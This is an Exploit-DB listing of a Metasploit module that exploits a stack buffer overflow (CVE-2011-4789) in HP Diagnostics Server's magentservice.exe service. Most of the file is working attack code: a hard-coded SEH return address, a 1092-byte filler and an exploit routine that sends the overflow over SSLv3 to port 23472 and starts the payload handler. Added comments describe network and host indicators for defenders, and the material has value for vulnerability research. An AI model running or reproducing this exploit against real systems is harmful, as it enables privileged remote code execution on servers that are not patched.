HP Diagnostics Server - 'magentservice.exe' Remote Overflow (Metasploit)

EDB-ID:

18423




Platform:

Windows

Date:

2012-01-27



require 'msf/core'

# Metasploit module for CVE-2011-4789 / OSVDB 72815 / ZDI-12-016: a stack buffer
# overflow in the HP Diagnostics Server 'magentservice.exe' service (see the
# 'Description' entry below).
#
# Defender notes, each derived only from the options declared in this file:
#   * Network surface: TCP/23472 (the default RPORT registered below), with
#     'SSL' => true and 'SSLVersion' => 'SSL3' as defaults — a service that
#     still negotiates SSLv3 on that port is itself worth inventorying.
#   * Traffic shape: a single write consisting of 4 NUL bytes, 1092 bytes of
#     uppercase ASCII, then the SEH record and encoded payload (see #exploit);
#     one oversized request per connection is what a network sensor sees.
#   * Host impact: 'Privileged' => true signals that a successful run yields
#     privileged access; EXITFUNC 'seh' is an exit technique that presumably
#     leaves the service in an abnormal state, so service crash/restart events
#     are a plausible host-side indicator (hedged — not demonstrated here).
#   * Scope: the only target entry is 'Diagnostics Server 9.10'; this module
#     asserts nothing about other builds. Mitigation is the vendor fix
#     referenced by the ZDI advisory URL in 'References'.
class Metasploit3 < Msf::Exploit::Remote
	# Author-assigned reliability rating of the module; not a severity rating.
	Rank = AverageRanking

	# Tcp provides connect / sock / disconnect; Seh provides generate_seh_payload.
	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Declares module metadata, default options, payload constraints and the
	# single supported target, then registers the default RPORT.
	#
	# @param info [Hash] base module info, merged via update_info
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP Diagnostics Server magentservice.exe overflow',
			# NOTE(review): "Harir" in the description vs "Hariri" in 'Author' —
			# one of the two spellings is presumably a typo. Left unchanged here
			# because it is a runtime string shown to users.
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP Diagnostics Server
				magentservice.exe service. By sending a specially crafted packet, an attacker
				may be able to execute arbitrary code. Originally found and posted by
				AbdulAziz Harir via ZDI.
			},
			'Author'         =>
				[
					'AbdulAziz Hariri', # Original discovery
					'hal',              # Metasploit module
				],
			'License'        => MSF_LICENSE,
			# Identifiers a defender can pivot on for patch and vulnerability data.
			'References'     =>
				[
					['OSVDB', '72815'],
					['CVE', '2011-4789'],
					['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-016/']
				],
			'Privileged'     => true,
			# SSL is on by default and pinned to SSLv3; the Tcp mixin's connect
			# honours these, so the request in #exploit travels inside an SSLv3
			# session rather than in the clear.
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
					'SSL' => true,
					'SSLVersion' => 'SSL3'
				},
			# Payload constraints handed to the encoder: at most 1000 bytes, no
			# NUL bytes (consistent with the 'Ret' address and the A-Z filler,
			# neither of which contains \x00).
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			# One target only; 'Ret' is consumed by generate_seh_payload in #exploit.
			'Targets'        =>
				[
					[
						'Diagnostics Server 9.10',
						{
							# pop esi # pop ebx # ret 10
							# magentservice.exe
							'Ret' => 0x780c8f1f
						}
					]
				],
			'DisclosureDate' => 'Jan 12 2012'))

			# Older two-argument form of register_options (options, owner class).
			register_options([Opt::RPORT(23472)], self.class)
	end

	# Builds the single request, sends it over the connection opened by the Tcp
	# mixin (SSL-wrapped per DefaultOptions), then hands off to the payload
	# handler. The request layout is fixed by the three appends below; the
	# 4-byte zero prefix and the 1092-byte filler length are the only
	# protocol-specific values this module carries, and the source does not
	# explain them further.
	#
	# @return [void]
	def exploit

		req =  "\x00\x00\x00\x00"               # 4-byte header; meaning not documented here
		req << rand_text_alpha_upper(1092)      # A-Z filler up to the SEH record (contains no \x00)
		req << generate_seh_payload(target.ret) # SEH record built from the target's 'Ret', then the payload

		connect
		sock.put(req) # one write; nothing is read back before the handler runs

		handler
		disconnect

	end
end